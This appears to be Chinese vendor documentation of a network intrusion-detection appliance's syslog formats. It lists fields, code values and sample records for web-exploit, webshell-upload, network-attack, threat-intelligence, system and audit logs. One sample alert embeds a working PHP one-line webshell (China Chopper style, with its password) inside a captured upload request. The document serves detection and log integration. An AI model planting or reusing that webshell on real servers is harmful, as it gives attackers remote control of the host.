syslog格式说明
1.1 网页漏洞利用告警
1.1.1 字段说明
1.1.2 字典类型字段说明
1.1.3 范例
1.2 webshell上传告警
1.2.1 字段说明
1.2.2 字典类型字段说明
1.2.3 范例
1.3 网络攻击告警
1.3.1 字段说明
1.3.2 字典类型字段说明
1.3.3 范例
1.4 威胁情报告警
1.4.1 字段说明
1.4.2 字典类型字段说明
1.4.3 范例
1.5 系统日志
1.5.1 字段说明
1.5.2 字典类型字段说明
1.5.3 范例
1.6 操作审计
1.6.1 字段说明
1.6.2 字典类型字段说明
1.6.3 范例
syslog格式说明
1.1 网页漏洞利用告警
1.1.1 字段说明
字段名字段含义
alert_type告警类型
serialno设备序列号
rule_id规则ID
rule_name规则名称
write_date告警时间
vuln_type漏洞类型
sip源IP
sport源端口
dip目的IP
dport目的端口
severity威胁等级
host主机地址
parameter参数
uriURI
filename文件名
refererreferer
method请求方法
vuln_desc漏洞描述
public_date公布时间
vuln_harm漏洞危害
solution解决方案
confidence确信度
victim_type受害主机类型
attack_flag攻击标识
attacker攻击者
victim受攻击者
attack_result攻击结果
kill_chain攻击链
code_language建站程序
public_date漏洞发布时间
rule_version规则版本
xffX-Forwarded-For字段
vlan_idVLAN字段
vxlan_idVXLAN字段
gre_keyGRE KEY 字段
1.1.2 字典类型字段说明
severity威胁等级：
2：低危
4：中危
6：高危
8：危急
attack_result 攻击结果：
0：企图
1：成功
2：失陷
3：失败
1.1.3 范例
webids_alert|!V90845289|!268567847|!发现上传一句话木马|!1731030918|!webshell上传|!102.75.71.84|!54998|!55.226.137.5|!80|!6|!10.16.66.7|!------WebKitFormBoundary843BvKrgA5x8TcA4#015#012Content-Disposition: form-data; name="File"; filename="pass-waf-2014-10-19.php"#015#012Content-Type: application/octet-stream#015#012#015#012<?php #012$item['tt'] = 'assert'; #012$array[] = $item; #012$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234 #012?>#015#012------WebKitFormBoundary843BvKrgA5x8TcA4--#015#012|!/?Command=Upload&Dir=%2F%20&TransferID=1&File=C%3A%5Cfakepath%5Cpass-waf-2014-10-19.php|!|!http://10.16.66.7/Web%20Client/Include/Upload.htm|!POST|!发现上传一句话木马，一句话木马内容较短但危害巨大，可以结合其他连接工具获取服务器权限，对服务器产生危害。|!2018-06-14 19:36:59|!受害主机可能已经被植入后门、远控或木马，导致受害主机已经沦陷，成为傀儡机。|!请尽快排查受害主机上是否存在相关恶意程序并进行查杀，并修复系统漏洞。|!50|!server|!true|!102.75.71.84|!55.226.137.5|!0|!0x02020000|!其他|!2018-06-14 19:36:59|!0|!|!|!|!74565

1.2 webshell上传告警
1.2.1 字段说明
字段名字段含义
alert_type告警类型
serialno设备序列号
rule_id规则ID
host主机地址
uriURI
file_md5文件MD5
sip源IP
sport源端口
dip目的IP
dport目的端口
attack_type攻击类型
write_date告警时间
severity威胁等级
attack_desc攻击描述
attack_harm攻击危害
confidence确信度
file_dir文件方向
victim_type受害主机类型
attack_flag攻击标识
attacker攻击者
victim受攻击者
attack_result攻击结果
kill_chain攻击链
rule_name规则名称
vlan_idVLAN字段
vxlan_idVXLAN字段
gre_keyGRE KEY 字段
1.2.2 字典类型字段说明
severity威胁等级：
2：低危
5：中危
8：危急
attack_result 攻击结果：
0：企图
1：成功
2：失陷
3：失败
1.2.3 范例
webshell_alert|!V90845289|!10001|!10.16.66.7|!/?Command=Upload&Dir=%2F%20&TransferID=1&File=C%3A%5Cfakepath%5Cpass-waf-2014-10-19.php|!1083f2634d1e672d6a427a081e577cad|!102.75.71.84|!54998|!55.226.137.5|!80|!中国菜刀变形|!1731030920|!8|!攻击者企图上传一个后门文件。后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序。该后门文件通过调用PHP函数eval来间接执行黑客指定的数据变量或内容（这些变量可能经过一定的拼接变换），实现对服务器的操作和控制。|!服务器被植入后门程序后可能导致以下后果：1.整个网站或者服务器被黑客控制，变成傀儡主机;2.核心数据被窃取，造成用户信息泄露。|!80|!upload|!server|!true|!102.75.71.84|!55.226.137.5|!0|!0x02010000|!中国菜刀变形.B|!|!|!74565

1.3 网络攻击告警
1.3.1 字段说明
字段名字段含义
alert_type告警类型
serialno设备序列号
rule_id规则ID
rule_name规则名称
write_date告警时间
vuln_type漏洞类型
sip源IP
sport源端口
dip目的IP
dport目的端口
severity威胁等级
info_id公开漏洞编号
affected_system受影响系统
protocol_id协议ID
attack_method攻击方法
appid应用ID
detail_info漏洞详情信息
bulletin公告
confidence确信度
victim_type受害主机类型
attack_flag攻击标识
attacker攻击者
victim受攻击者
cnnvdCNNVD编号
attack_result攻击结果
kill_chain攻击链
rule_version规则版本
vlan_idVLAN字段
vxlan_idVXLAN字段
gre_keyGRE KEY 字段
1.3.2 字典类型字段说明
severity威胁等级：
2：低危
4：中危
6：高危
8：危急
appid应用ID：
1：finger
2：netop-remote-control
3：netbios-ss
4：smtp
5：ctd-dummy
6：yy-voice
7：h245
8：ipsec-esp-udp
9：freegate
10：stun
11：spotify
12：nfs
13：msn-http-gate
14：pptp
15：gtp
16：gtalk-voice
17：msn-video
18：msn-voice
19：ssl
20：msn
21：db2
22：yoics
23：imvu
24：asterisk-iax
25：mgcp
26：vmware
27：llmnr
28：netbios-dg
29：h225
30：mssql-mon
31：h248
32：nintendo-wfc
33：msn-file-transfer
34：buddybuddy
35：imap
36：t3
37：wins
38：fetion
39：snpp
40：ms-virtualserver
41：t_120
42：teredo
43：cvs
44：bittorrent
45：ftp-data
46：ftp
47：google-base
48：pcanywhere
49：radius
50：dhcp
51：tv4play
52：corba
53：sccp
54：maxdb
55：dccp
56：unistim
57：ipv6
58：yahoo-im
59：ezpeer
60：playstation-network
61：jabber
62：open-vpn
63：qq
64：telnet
65：rediffbol
66：cpq-wbem
67：xdmcp
68：gtalk-p2p
69：gds-db
70：pop3
71：rtmp
72：ldap
73：tcp
74：xbox-live
75：pgm
76：teamviewer
77：http
78：sctp
79：gnutella
80：mail_ru-agent
81：aim-file-transfer
82：igmp
83：oracle
84：bomgar
85：subspace
86：mms
87：pre-app
88：msrpc
89：icmp
90：modbus
91：ip-messenger
92：tales-runner
93：hp-data-protector
94：tcp
95：maplestory
96：generic
97：mssql-db
98：postgres
99：ipv6-icmp
100：net2phone
101：dnp3
102：ike
103：sip
104：nntp
105：gdbremote
106：irc
107：gnutella-internal
108：kerberos
109：simplify
110：ntp
111：rpc
112：viber
113：gtalk-file-transfer
114：google-talk
115：iccp
116：tivoli-storage-manager
117：ali-wangwang
118：xware-xtrm
119：socks
120：sybase
121：mongodb
122：vnc
123：netbios-ns
124：time
125：lwapp
126：informix
127：softros-messenger
128：nateon-internal
129：oracle-bi
130：dns
131：citrix-jedi
132：aol-proxy
133：bit-internal
134：rmcp
135：share-p2p
136：gotomypc
137：bit-predict
138：lpd
139：unknown
140：smb
141：showmypc
142：adnstream
143：snmp
144：mysql
145：cotp
146：ssh
147：tftp
148：icq
149：rtsp
150：panav
151：skype-probe
152：ameba-blog-posting
153：ameba-now-posting
154：facebook-posting
155：linkedin-posting
156：pastebin-posting
157：pinterest-posting
158：qik-posting
159：sharepoint-blog-posting
160：storify-posting
161：tumblr-posting
200：http_lite
201：file-parser
202：brass
203：smb-8-1
204：bacnet
205：damengdb
attack_result 攻击结果：
0：企图
1：成功
2：失陷
3：失败
1.3.3 范例
ips_alert|!V90845289|!23204|!SaltStack远程命令执行漏洞(CVE-2020-11651/CVE-2020-11652)|!1731030918|!代码执行|!192.168.19.145|!50182|!192.168.19.130|!4506|!8|!|!|!6|!远程|!0|!国外安全研究人员披露SaltStack存在两个严重的安全漏洞。Saltstack是基于python开发的一套C/S自动化运维工具，此次被爆当中存在身份验证绕过漏洞（CVE-2020-11651）和目录遍历漏洞（CVE-2020-11652），攻击者利用漏洞可实现远程命令执行、读取服务器上任意文件、获取敏感信息等。#015#012影响版本：#015#012SaltStack < 2019.2.4#015#012SaltStack < 3000.2|!1、目前官方已在最新版本中修复了这两处漏洞，请受影响的用户及时升级到安全版本。#015#012下载地址：https://repo.saltstack.com#015#0122、Salt Master默认监听端口为4505 和 4506，用户可通过配置安全组，禁止将其对公网开放，或仅对可信对象开放。|!80|!server|!true|!192.168.19.145|!192.168.19.130|!|!0|!0x02020000|!3.0.1106.14059|!|!|!74565

1.4 威胁情报告警
1.4.1 字段说明
字段名字段含义
alert_type告警类型
serialno设备序列号
rule_id情报ID
host主机地址
uriURI
file_md5传输文件MD5
sip源IP
sport源端口
dip目的IP
dport目的端口
write_date告警时间
severity威胁等级
confidence确信度
file_dir文件方向
attacker攻击者
victim受攻击者
attack_type威胁类型
attack_name威胁名称
IOC威胁情报
IOC_type威胁情报类型
proto应用层协议
tproto传输层协议
dns_typeDNS请求响应类型
dnsarecordDNS A记录
file_name传输文件名
malicious_family恶意家族
campaign攻击事件/团伙
targeted定向攻击
platform影响平台
ioc_source情报来源
vlan_idVLAN字段
vxlan_idVXLAN字段
gre_keyGRE KEY 字段
1.4.2 字典类型字段说明
severity威胁等级：
3：低危
5：中危
7：高危
9：危急
Ioc_source 情报来源：
0：云端下发
1：自定义
1.4.3 范例
ioc_alert|!V90845289|!17298326168730075137|!baidu.com|!/test|!|!3.3.3.1|!38938|!3.3.3.2|!443|!1731030916000|!7|!high|!|!3.3.3.2|!3.3.3.1|!其他|!ceshi|!baidu.com|!host|!http|!tcp|!0|!|!|!test.org|!|!0|!|!1|!|!|!74565

1.5 系统日志
1.5.1 字段说明
字段名字段含义
updatetime更新时间
level日志级别
serialno设备序列号
sub_type日志子类型
note日志详情
type日志类型
log_type日志父类型
1.5.2 字典类型字段说明
sub_type日志子类型：
0：运行日志
1：升级日志
type日志类型：
2：CPU过高
3：内存过高
4：硬盘故障
5：证书过期
11：磁盘占用
14：异常日志
level日志级别：
3：错误
4：警告
5：通知
1.5.3 范例
updatetime:2022-12-29 15:44:28.224151|!level:3|!serialno:214585853|!sub_type:0|!note:【syslog服务器-1.1.1.1:514】连接断开|!type:14|!log_type:系统日志

1.6 操作审计
1.6.1 字段说明
字段名字段含义
username操作者
serialno设备序列号
submod二级模块
detail日志详情
updatetime更新时间
ip设备IP
sub2三级模块
log_type日志父类型
module一级模块
sub_type日志子类型
1.6.2 字典类型字段说明
sub_type日志子类型：
0：新增
1：删除
2：编辑
3：查看
1.6.3 范例
username:admin|!serialno:214585853|!submod:安全性配置|!detail:message：获取敏感密码成功|!updatetime:2022-12-29 15:44:14.861246|!ip:10.91.130.33|!sub2:敏感操作密码|!log_type:操作审计|!module:系统管理|!sub_type:3